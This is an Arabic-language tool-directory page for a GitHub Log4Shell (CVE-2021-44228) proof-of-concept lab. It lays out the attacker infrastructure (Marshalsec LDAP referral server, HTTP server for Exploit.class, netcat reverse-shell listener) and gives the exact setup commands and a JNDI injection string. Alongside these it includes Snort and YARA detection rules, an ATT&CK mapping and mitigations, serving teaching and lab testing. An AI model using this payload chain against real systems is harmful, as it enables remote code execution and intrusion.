Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Log4Shell-PoC — **Log4Shell PoC هي بيئة استغلال عالية الدقة مصممة لمحاكاة الثغرة CVE-2021-44228.** وهي توفر صندوق رمل معزول (containerized sandbox) لإثبات حقن JNDI، وإعادة توجيه الإحالات LDAP/RMI، وتنفيذ الأوامر عن بعد (RCE) عبر مكتبة Log4j 2. | Kitploit
أدوات/GitHubGitHub/josemariamicoli/log4shell-poc
تحليل الثغرات الأمنيةالاستغلالالتهرب من IDS/IPSاستغلال تطبيقات الويبالقيادة والسيطرةالتعلم والتعليمالاستجابة للحوادثتطوير الحمولاتمختبرات وتدريب عملي
GitHubjosemariamicoli/log4shell-poc

Log4Shell-PoC

**Log4Shell PoC هي بيئة استغلال عالية الدقة مصممة لمحاكاة الثغرة CVE-2021-44228.** وهي توفر صندوق رمل معزول (containerized sandbox) لإثبات حقن JNDI، وإعادة توجيه الإحالات LDAP/RMI، وتنفيذ الأوامر عن بعد (RCE) عبر مكتبة Log4j 2.

عرض المستودع
12منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗███████╗██╗ ██╗
██║ ██╔═══██╗██╔════╝ ██║ ██║██╔════╝██║ ██║██╔════╝██║ ██║
██║ ██║ ██║██║ ███╗███████║███████╗███████║█████╗ ██║ ██║
██║ ██║ ██║██║ ██║╚════██║╚════██║██╔══██║██╔══╝ ██║ ██║
███████╗╚██████╔╝╚██████╔╝ ██║███████║██║ ██║███████╗███████╗███████╗ ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝

root@kitploit:~
                         ██████╗  ██████╗  ██████╗
                         ██╔══██╗██╔═══██╗██╔════╝
                         ██████╔╝██║   ██║██║     
                         ██╔═══╝ ██║   ██║██║     
                         ██║     ╚██████╔╝╚██████╔╝
                         ╚═╝      ╚═════╝  ╚═════╝ 

         ⚡ LOG4SHELL (CVE-2021-44228) PoC LAB
          [ PROOF OF CONCEPT & JNDI EXPLOITATION ]

Log4Shell PoC هي بيئة استغلال عالية الدقة مصممة لمحاكاة الثغرة الأمنية CVE-2021-44228. توفر صندوق حماية مُحَوْسَبًا لعرض حقن JNDI، وإعادة التوجيه المرجعي LDAP/RMI، وتنفيذ التعليمات البرمجية عن بُعد (RCE) عبر مكتبة Log4j 2.


⚠️ إخلاء مسؤولية

للاستخدام التعليمي واختبار الأمان المصرح به فقط.

استخدام هذا الإثبات المفاهيمي لمهاجمة أهداف دون موافقة مسبقة متبادلة غير قانوني. يتحمل المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والفيدرالية المعمول بها. لا يتحمل المؤلفون أي مسؤولية ولا يتحملون المسؤولية عن أي فقدان للبيانات أو تلف النظام أو عواقب قانونية أو إساءة استخدام ناتجة عن هذا البرنامج. باستخدام هذا البرنامج، فإنك توافق على العمل ضمن الحدود القانونية لولايتك القضائية.



القسم 2: إمكانيات المشروع وهيكله

🚀 إمكانيات الإثبات المفاهيمي

  • حقن JNDI: نقطة دخول ضعيفة في Log4j 2.14.1.
  • خادم إحالة LDAP: إعادة توجيه LDAP ضارة عبر Marshalsec.
  • تحميل الفئات عن بُعد: توصيل بَريْت كود جافا المُجمَّع عبر HTTP.
  • حمولة متعددة المراحل: تنفيذ شِل عكسي بلغة جافا أصلية.
  • اختبار المراوغة: تجاوزات TrustURLCodebase و FormatMsgNoLookups.

🛠 هيكل الإثبات المفاهيمي

🛰 بنية ضارة (مهاجم)

يتكون جانب المهاجم من ثلاث قنوات متميزة لتسهيل الإثبات المفاهيمي.

  • معيد توجيه LDAP (المنفذ 1389): مبني على Marshalsec، يوجه طلب JNDI للضحية إلى الاستغلال المُستضاف.
  • خادم حمولة HTTP (المنفذ 8888): يستضيف بَريْت كود Exploit.class ليقوم الضحية بتنزيله وتنفيذه.
  • مستمع NC (المنفذ 9001): وجهة الاتصال النهائية للشِل العكسي.

💻 مثيل ضعيف (ضحية)

بيئة OpenJDK 8 مُحَوْسَبَة تعمل على تطبيق Log4j ضعيف.

  • Log4j v2.14.1: إصدار المكتبة المُستهدف.
  • VulnerableLog.java: تطبيق جافا بسيط يسجل إدخال المستخدم دون تنقية.


القسم 3: تعليمات الإعداد والتنفيذ

⚙️ الإعداد والتنفيذ

1. إعداد المهاجم (آرتش لينكس)

التبويب 1: خادم إحالة LDAP

root@kitploit:~
docker run --rm -it -p 1389:1389 maven:3.8.6-openjdk-8 /bin/bash -c "
git clone [https://github.com/mbechler/marshalsec.git](https://github.com/mbechler/marshalsec.git) && \
cd marshalsec && \
mvn clean package -DskipTests && \
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer '[http://172.17.0.1:8888/#Exploit](http://172.17.0.1:8888/#Exploit)' 1389"

التبويب 2: توصيل حمولة HTTP

root@kitploit:~
# ابدأ خادم بايثون في الدليل الذي يحتوي على Exploit.class
python3 -m http.server --bind 0.0.0.0 8888

التبويب 3: مستمع Netcat

root@kitploit:~
nc -lvnp 9001

2. تنفيذ الضحية

التبويب 4: تشغيل الحاوية الضعيفة

root@kitploit:~
docker run --rm -it -v $(pwd):/app -w /app openjdk:8u121-jdk-alpine /bin/sh

داخل الحاوية: تشغيل الإثبات المفاهيمي

root@kitploit:~
java -Dlog4j2.formatMsgNoLookups=false \
     -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
     -cp ".:log4j-api-2.14.1.jar:log4j-core-2.14.1.jar" \
     VulnerableLog '${jndi:ldap://172.17.0.1:1389/Exploit}'



القسم 4: الاكتشاف والتخفيف

🔍 الاكتشاف والمراقبة الدفاعية

1. اكتشاف الشبكة (Snort/Suricata)

root@kitploit:~
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET EXPLOIT Possible Log4j RCE Attempt (jndi)"; content:"jndi|3a|"; nocase; sid:2034647; rev:1;)

2. اكتشاف قائم على السجلات (YARA)

root@kitploit:~
rule Log4Shell_PoC_JNDI {
    meta:
        description = "يكتشف سلاسل بحث JNDI في السجلات المستخدمة في الإثبات المفاهيمي"
        author = "Apex Pro Framework"
    strings:
        $jndi = / \$\{jndi:(ldap|rmi|dns|nis|iiop|corba|lds):/ i
        $obfuscated = /\$\{\$\{[^}]+\}ndi:/ i
    condition:
        any of them
}

🛡 مصفوفة الاستجابة للحوادث (IR)

المرحلةالتقنيةتم تفعيل التنبيه؟MITRE ATT&CK
الوصول الأولياستغلال التطبيق المواجه للعموم[ ]T1190
التنفيذمترجم الأوامر والنصوص البرمجية[ ]T1059
القيادة والتحكمبروتوكول طبقة التطبيق (LDAP)[ ]T1071.003
التسريببروتوكول غير طبقة التطبيق[ ]T1048

🔒 التخفيف والتحصين

  1. التحديث: التحديث إلى Log4j 2.17.1 أو أعلى.
  2. علامة JVM: تعيين -Dlog4j2.formatMsgNoLookups=true لتعطيل عمليات البحث.
  3. إزالة الفئة: إزالة JndiLookup.class يدويًا من ملف JAR الخاص بـ log4j-core.

🔒 قواعد الاشتباك

  1. العزل: ترميز عناوين IP الهدف في جسر Docker الداخلي (172.17.0.0/16).
  2. الشبكات: التأكد من استخدام شبكة VM (جهاز افتراضي) للمضيف فقط/داخلية فقط.
  3. أمان C2: عدم تعريض خوادم Python أو LDAP للإنترنت العام.

تنزيل الأداة